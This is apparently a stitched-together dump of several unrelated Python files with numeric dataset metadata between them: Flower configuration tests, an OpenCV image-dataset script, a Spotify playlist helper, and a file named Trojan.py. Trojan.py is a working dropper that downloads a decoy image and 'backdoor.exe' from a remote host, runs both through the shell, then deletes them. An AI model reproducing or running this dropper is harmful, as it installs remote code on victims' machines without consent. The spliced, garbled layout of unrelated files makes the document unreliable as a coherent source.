with tempfile.NamedTemporaryFile() as cf:
with self.mock_option('conf', cf.name), self.mock_option('debug', False):
cf.write('debug=True\n'.encode('utf-8'))
cf.flush()
apply_options('flower', argv=['--conf=%s' % cf.name])
self.assertEqual(cf.name, options.conf)
self.assertTrue(options.debug)
def test_conf_relative(self):
with tempfile.NamedTemporaryFile(dir='.') as cf:
with self.mock_option('conf', cf.name), self.mock_option('debug', False):
cf.write('debug=True\n'.encode('utf-8'))
cf.flush()
apply_options('flower', argv=['--conf=%s' % os.path.basename(cf.name)])
self.assertTrue(options.debug)
@unittest.skipUnless(not sys.platform.startswith("win"), 'skip windows')
def test_all_options_documented(self):
        def grep(pattern, filename):
            return int(subprocess.check_output(
                'grep "%s" %s|wc -l' % (pattern, filename), shell=True))
defined = grep('^define(', 'flower/options.py') - 4
documented = grep('^~~', 'docs/config.rst')
self.assertEqual(defined, documented,
msg='Missing option documentation. Make sure all options '
'are documented in docs/config.rst')
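The mock_option context manager used throughout comes from the AsyncHTTPTestCase base class in tests.unit and is not shown here; a minimal sketch of what such a save/override/restore helper could look like, assuming tornado's global options object:

from contextlib import contextmanager
from tornado.options import options

@contextmanager
def mock_option(name, value):
    old = getattr(options, name)     # remember the current value
    setattr(options, name, value)    # override for the duration of the test
    try:
        yield
    finally:
        setattr(options, name, old)  # always restore, even on failure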
| 39.748252
| 106
| 0.645144
| 677
| 5,684
| 5.172821
| 0.25997
| 0.029983
| 0.048544
| 0.068532
| 0.449172
| 0.408909
| 0.408909
| 0.368075
| 0.296402
| 0.296402
| 0
| 0.01049
| 0.228536
| 5,684
| 142
| 107
| 40.028169
| 0.788141
| 0.018473
| 0
| 0.304762
| 0
| 0
| 0.170132
| 0.031821
| 0
| 0
| 0
| 0
| 0.161905
| 1
| 0.152381
| false
| 0
| 0.104762
| 0.009524
| 0.314286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e91557146c36922257c5f4c9ff456b0ce8b407c
| 534
|
py
|
Python
|
Trojan.py
|
alrocks29/alpha-backdoor
|
16a2d0ffdb183005f687bdf19b25cc918a1f12a0
|
[
"MIT"
] | null | null | null |
Trojan.py
|
alrocks29/alpha-backdoor
|
16a2d0ffdb183005f687bdf19b25cc918a1f12a0
|
[
"MIT"
] | null | null | null |
Trojan.py
|
alrocks29/alpha-backdoor
|
16a2d0ffdb183005f687bdf19b25cc918a1f12a0
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import requests
import subprocess
import os
import tempfile
def download(url):
get_response = requests.get(url)
file_name = url.split("/")[-1]
with open(file_name, "wb") as out_file:
out_file.write(get_response.content)
temp_directory = tempfile.gettempdir()
os.chdir(temp_directory)
download("http://ip/image.jpg")
subprocess.Popen("image.jpg", shell=True)
download("http://ip/backdoor.exe")
subprocess.call("backdoor.exe", shell=True)
os.remove("image.jpg")
os.remove("backdoor.exe")
| 21.36
| 44
| 0.724719
| 77
| 534
| 4.922078
| 0.519481
| 0.063325
| 0.073879
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002119
| 0.116105
| 534
| 24
| 45
| 22.25
| 0.800847
| 0.037453
| 0
| 0
| 0
| 0
| 0.167641
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.235294
| 0
| 0.294118
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e91fe4c0f8f01c97da338f53c30caedc69665c2
| 3,524
|
py
|
Python
|
Assignments/Assignment_1/Q1/task1.py
|
Kaustubh1Verma/CS671_Deep-Learning_2019
|
062002a1369dc962feb52d3c9561a3f1153e0f84
|
[
"MIT"
] | null | null | null |
Assignments/Assignment_1/Q1/task1.py
|
Kaustubh1Verma/CS671_Deep-Learning_2019
|
062002a1369dc962feb52d3c9561a3f1153e0f84
|
[
"MIT"
] | null | null | null |
Assignments/Assignment_1/Q1/task1.py
|
Kaustubh1Verma/CS671_Deep-Learning_2019
|
062002a1369dc962feb52d3c9561a3f1153e0f84
|
[
"MIT"
] | 1
|
2019-06-12T14:02:33.000Z
|
2019-06-12T14:02:33.000Z
|
import numpy as np
import cv2
import math
import random
import os
from tempfile import TemporaryFile
from sklearn.model_selection import train_test_split
# Creating classes.
length=[7,15]
width=[1,3]
col=[]
col.append([0,0,255]) # Red (OpenCV uses BGR channel order)
col.append([255,0,0]) # Blue (OpenCV uses BGR channel order)
interval=15
angles=[]
x=0
while x<180:
angles.append(x)
x+=interval
dirn=1
a1=0
os.mkdir("/home/aj/Desktop/DL2")
for l in length:
a2=0 #a1 0->7,1->15
for w in width:
a3=0 #a2 0->1,1->3
for co in col:
a4=0 #a3 0->red,1->blue
for ang in angles:
flag=0
m=0
os.mkdir("/home/aj/Desktop/DL2/"+str(dirn))
while flag<1000:
img=np.zeros((28,28,3),np.uint8)
x=random.randrange((28-math.ceil(l*math.sin(math.radians(180-ang)))))
y=random.randrange((28-math.ceil(l*math.sin(math.radians(180-ang)))))
endy = y+l*math.sin(math.radians(180-ang))
endy=math.floor(endy)
endx = x+l*math.cos(math.radians(180-ang))
endx=math.floor(endx)
if(0<=endx<=28 and 0<=endy<=28):
cv2.line(img,(x,y),(endx,endy),co,w)
flag=flag+1
cv2.imwrite("/home/aj/Desktop/DL2/"+str(dirn)+"/"+str(a1)+"_"+str(a2)+"_"+str(a4)+"_"+str(a3)+"_"+str(flag)+".png",img)
dirn+=1
a4+=1
a3=a3+1
a2=a2+1
a1=a1+1
outfile = TemporaryFile()
# Creating Frames
train=[]
train_class=[]
test_class=[]
allimg=[]
label=[]
flag=0
# os.mkdir("/home/aj/Desktop/DL2/frames")
for count in range (1,97):
f=[]
# os.mkdir("/home/aj/Desktop/DL2/frames/frame_"+str(count))
f=os.listdir("/home/aj/Desktop/DL2/"+str(count))
for fi in f:
# print(fi)
n=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+fi)
n = n.reshape(2352)
allimg.append(n)
label.append(flag)
flag+=1
for i in range (0,10):
img1=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i],1)
img2=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+1],1)
img3=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+2],1)
img1f=np.concatenate((img1,img2,img3),axis=1)
img4=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+3],1)
img5=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+4],1)
img6=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+5],1)
img2f=np.concatenate((img4,img5,img6),axis=1)
img7=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+6],1)
img8=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+7],1)
img9=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+8],1)
img3f=np.concatenate((img7,img8,img9),axis=1)
imgf=np.concatenate((img1f,img2f,img3f),axis=0)
cv2.imwrite("/home/aj/Desktop/DL2/frames/frame_"+str(count)+"/"+"f"+str(i+1)+".png",imgf)
# print(allimg[0])
# print(label[0:97])
X_train, X_test, y_oldtrain, y_oldtest = train_test_split(allimg, label, test_size=0.40, random_state=42)
# print(y_oldtrain[0:10])
y_oldtrain = np.array(y_oldtrain).reshape(-1)
y_train=np.eye(96)[y_oldtrain]
y_oldtest = np.array(y_oldtest).reshape(-1)
y_test=np.eye(96)[y_oldtest]
np.savez_compressed("/home/aj/Desktop/DL2/outfile",X_train=X_train,X_test=X_test,y_train=y_train,y_test=y_test)
# Creating Video
# img_frame=[]
# for i in range (1,97):
# f=[]
# f=os.listdir("/home/aj/Desktop/DL2/frames/frame_"+str(i))
# path="/home/aj/Desktop/DL2/frames/frame_"+str(i)+"/"
# for file in f:
# img = cv2.imread(path+file)
# height,width,layers = img.shape
# size = (width,height)
# img_frame.append(img)
# out = cv2.VideoWriter("/home/aj/Desktop/DL2/assign1.mp4",0x7634706d,5, size)
# for i in range(len(img_frame)):
# out.write(img_frame[i])
# out.release()
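The frame-building loop above tiles nine 28x28 images into a 3x3 mosaic by concatenating three rows of three; the same tiling written as a small helper, assuming a list of nine equally sized arrays:

import numpy as np

def make_mosaic(tiles):
    # tiles: nine HxWx3 arrays in row-major order
    rows = [np.concatenate(tiles[r * 3:(r + 1) * 3], axis=1) for r in range(3)]
    return np.concatenate(rows, axis=0)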
| 32.036364
| 126
| 0.653235
| 641
| 3,524
| 3.524181
| 0.215289
| 0.055777
| 0.12085
| 0.148738
| 0.361664
| 0.351926
| 0.326251
| 0.27313
| 0.216467
| 0.184595
| 0
| 0.071291
| 0.116345
| 3,524
| 110
| 127
| 32.036364
| 0.654143
| 0.200624
| 0
| 0.023529
| 0
| 0
| 0.13625
| 0.120115
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.082353
| 0
| 0.082353
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e949a6f4b8f9d86c879098cae8dde8d91b75f85
| 10,163
|
py
|
Python
|
helpers.py
|
jchanke/mixtape50
|
68d03034b503fd0374b9fcba1c1d5207ed7f0170
|
[
"MIT"
] | 1
|
2022-03-15T11:49:54.000Z
|
2022-03-15T11:49:54.000Z
|
helpers.py
|
jchanke/mixtape50
|
68d03034b503fd0374b9fcba1c1d5207ed7f0170
|
[
"MIT"
] | null | null | null |
helpers.py
|
jchanke/mixtape50
|
68d03034b503fd0374b9fcba1c1d5207ed7f0170
|
[
"MIT"
] | null | null | null |
"""
Does the legwork of searching for matching tracks.
Contains:
(1) Search functions:
- search_message
- search_spotipy
- search_db
- search_lookup
(2) String parsers (to clean title name):
- clean_title
- remove_punctuation
(3) Creates new Spotify playlist.
- create_playlist
"""
from typing import Any, List, Dict, Union
import os
import re
import sqlite3
import time
import spotipy
from spotipy.oauth2 import SpotifyOAuth
from announcer import MessageAnnouncer, format_sse
# Localhost URL to access the application; Flask runs on port 5000 by default
# Adapted from https://github.com/Deffro/statify/blob/dd15a6e70428bd36ecddb5d4a8ac3d82b85c9339/code/server.py#L553
CLIENT_SIDE_URL = "http://127.0.0.1"
PORT = 5000
# Get environment variables
SPOTIPY_CLIENT_ID = os.getenv("SPOTIPY_CLIENT_ID")
SPOTIPY_CLIENT_SECRET = os.getenv("SPOTIFY_CLIENT_SECRET")
SPOTIPY_REDIRECT_URI = f"{CLIENT_SIDE_URL}:{PORT}/callback"
SCOPE = "playlist-modify-public playlist-modify-private playlist-read-private"
# Set up Spotipy
sp = spotipy.Spotify(auth_manager = SpotifyOAuth(client_id = SPOTIPY_CLIENT_ID,
client_secret = SPOTIPY_CLIENT_SECRET,
redirect_uri = SPOTIPY_REDIRECT_URI,
scope = SCOPE,
))
# Create ('instantiate') a MessageAnnouncer object
announcer = MessageAnnouncer()
"""
(1) Search functions:
- search_message
- search_spotipy
- search_db
- search_lookup
"""
def search_message(message: str, max_search_length: int = 10,
query_lookup: Dict[str, list] = dict(), failed_queries: set = set()) -> List[Union[list, Any]]:
"""
search_message(message, max_search_length = 10)
Returns a list of song names (change to ids) matching the message.
Uses regex-style greedy search.
Song names will be limited to [max_search_length] words (default is 10, can
be adjusted.)
Returns songs from Spotify API via spotipy library; if not, checks
Spotify 1.2M songs dataset via an sqlite3 query.
    Memoizes successful queries (to query_lookup) and failed queries (to
    failed_queries).
https://www.kaggle.com/rodolfofigueroa/spotify-12m-songs
"""
# Split message into list of lower-case words
message = remove_punctuation(message.casefold()).split()
# Gets up to max_search_length words of message
query_length = min(max_search_length, len(message))
# List containing search functions to iterate over
search_functions = [
search_lookup,
search_spotipy,
search_db,
]
# Wait 0.2 seconds to ensure /creating has loaded
time.sleep(0.2)
# Splits query into prefix and suffix, decrementing prefix, until
# - prefix exactly matches a song
# - suffix can be expressed as a list of songs
for i in range(query_length):
prefix, suffix = message[:query_length - i], message[query_length - i:]
prefix, suffix = " ".join(prefix), " ".join(suffix)
announcer.announce(format_sse(event = "add", data = prefix))
# Only search if suffix is not known to fail
if suffix in failed_queries:
time.sleep(0.1)
announcer.announce(format_sse(event = "drop", data = prefix))
continue # back to the start of the 'for' loop
# Looping through search functions,
for search_function in search_functions:
# Search for tracks matching prefix
prefix_results = search_function(prefix, query_lookup = query_lookup)
if prefix_results:
query_lookup[prefix] = prefix_results
print(f"Try: {prefix} in {search_function.__name__.replace('search_', '')}")
# In announcer: replace prefix, add each track in prefix_results
announcer.announce(format_sse(event = "drop", data = prefix))
for track in map(lambda tracks: tracks[0]["name"], prefix_results):
announcer.announce(format_sse(event = "add", data = remove_punctuation(clean_title(track.casefold()))))
time.sleep(0.1)
# Base case: if prefix is whole message, suffix == "", so we should just return prefix
if suffix == "":
print(f"All done!")
announcer.announce(format_sse(event = "lock in"))
return prefix_results
                # Recursive case: make sure the suffix can be split into songs as well
suffix_results = search_message(suffix, max_search_length = max_search_length,
query_lookup = query_lookup, failed_queries = failed_queries)
# If both are valid, return joined list
if suffix_results:
results = prefix_results + suffix_results
query_lookup[" ".join([prefix, suffix])] = results
return results
# Suffix cannot be split into songs, drop prefix
for track in map(lambda tracks: tracks[0]["name"], prefix_results):
announcer.announce(format_sse(event = "drop", data = remove_punctuation(clean_title(track.casefold()))))
time.sleep(0.1)
print(f"\"{suffix}\" suffix can't be split.")
break # suffix doesn't work, try next prefix-suffix pair
# Prefix not found in all search functions, drop it
else:
print(f"\"{prefix}\" doesn't work, moving on.")
announcer.announce(format_sse(data = "prefix doesn't work, dropping it"))
announcer.announce(format_sse(event = "drop", data = prefix))
# Recursive case: failure
failed_queries.add(" ".join(message))
return []
def search_lookup(query: str, query_lookup: Dict[str, list]) -> list:
"""
Checks query_lookup (a dictionary created at the initial function call
of search_message) and returns the results of the query if it has
already been found.
"""
# Checks query_lookup dict
if query in query_lookup:
return query_lookup[query]
else:
return []
def search_spotipy(query: str, query_lookup: Dict[str, list]) -> list:
"""
Uses Spotify API via spotipy library to return a list of songs (name
& id) which match the query.
Note: the query_lookup parameter is not used. It is only included
in the definition because query_lookup is passed to search_functions.
"""
# Attributes to return
attributes = ["name", "id"]
# Search for tracks where the name matches query
results = sp.search(q=f"track:\"{query}\"", type="track", limit=50)
results = results["tracks"]["items"]
results = [{ attr: item[attr] for attr in attributes } for item in results if remove_punctuation(clean_title(item["name"].casefold())) == remove_punctuation(query)]
# If no results, return empty list:
if results == []:
return []
else:
return [results]
def search_db(query: str, query_lookup: Dict[str, list]) -> list:
"""
Searches tracks.db (1.2 million songs from Spotify from the Kaggle
database) to return a list of songs (name & id) which match the
query.
https://www.kaggle.com/rodolfofigueroa/spotify-12m-songs
"""
# Import sqlite database
tracks = sqlite3.connect("tracks.db")
db = sqlite3.Cursor(tracks)
# SQLite3 query
results = db.execute("SELECT name, id FROM tracks WHERE name_cleaned = ?", [remove_punctuation(query)]).fetchall()
results = list(map(lambda item: {
"name": item[0],
"id": item[1],
}, results))
# If no results, return empty list
if results == []:
return []
else:
return [results]
"""
(2) String parsers (to clean title name):
- clean_title
- remove_punctuation
"""
def clean_title(title):
"""
Cleans title by performing the following transformations in order:
- Remove substrings enclosed in (...) or [...] and preceding whitespace (using regex greedy matching)
- Remove " - " and substring after
- Remove " feat.", " ft(.)", or " featuring" and substring after
https://stackoverflow.com/questions/14596884/remove-text-between-and
"""
# (Greedy) replace substrings between (...) and []
title = re.sub(r"\s+\(.+\)", "", title)
title = re.sub(r"\s+\[.+\]", "", title)
# Remove " - " and subsequent substring
title = re.sub(r" - .*", "", title)
# Remove " feat(.) ", " ft(.) ", or " featuring " (but not "feature") and substring after
title = re.sub(r"\W+(ft[:.]?|feat[:.]|featuring)\s.*", "", title)
return title
def remove_punctuation(title):
"""
Removes punctuation by performing the following transformations:
- Delete XML escape sequences: & " < > '
- Replace "/", "//", etc. and surrounding whitespace with " " (in medley titles)
- Replace "&" and surrounding whitespace with " and "
- Remove the following characters from the string: !"#$%'‘’“”()*+,-.:;<=>?@[\]^_—`{|}~
- Strips surrounding whitespace
"""
title = re.sub(r"&[amp|quot|lt|gt|apos];", "", title)
title = re.sub(r"\s*\/+\s*", " ", title)
title = re.sub(r"\s*&\s*", " and ", title)
title = re.sub(r"[!\"#$%'‘’“”()*+,-.:;<=>?@[\\\]^_—`{|}~]", "", title)
title = re.sub(r"\s{2,}", " ", title)
return title.strip()
"""
(3) Creates new Spotify playlist.
"""
def create_playlist(results):
"""
Takes the result of search_message as input.
Constructs a playlist (via the spotipy library).
Returns the Spotify id of the playlist.
"""
# Process items
items = list(map(lambda songs: songs[0]["id"], results))
# Create playlist
playlist = sp.user_playlist_create(
user=sp.me()["id"],
name="mixtape50",
public=False,
collaborative=False,
description="Created with Mixtape50: https://github.com/jchanke/mixtape50."
)
sp.playlist_add_items(playlist_id=playlist["id"], items=items)
return playlist["id"]
| 34.686007
| 168
| 0.630326
| 1,248
| 10,163
| 5.022436
| 0.258814
| 0.029834
| 0.014359
| 0.015795
| 0.25
| 0.190491
| 0.185227
| 0.17007
| 0.124442
| 0.115507
| 0
| 0.012773
| 0.25278
| 10,163
| 293
| 169
| 34.686007
| 0.812352
| 0.378136
| 0
| 0.169492
| 0
| 0
| 0.110387
| 0.038053
| 0
| 0
| 0
| 0
| 0
| 1
| 0.059322
| false
| 0
| 0.067797
| 0
| 0.228814
| 0.033898
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|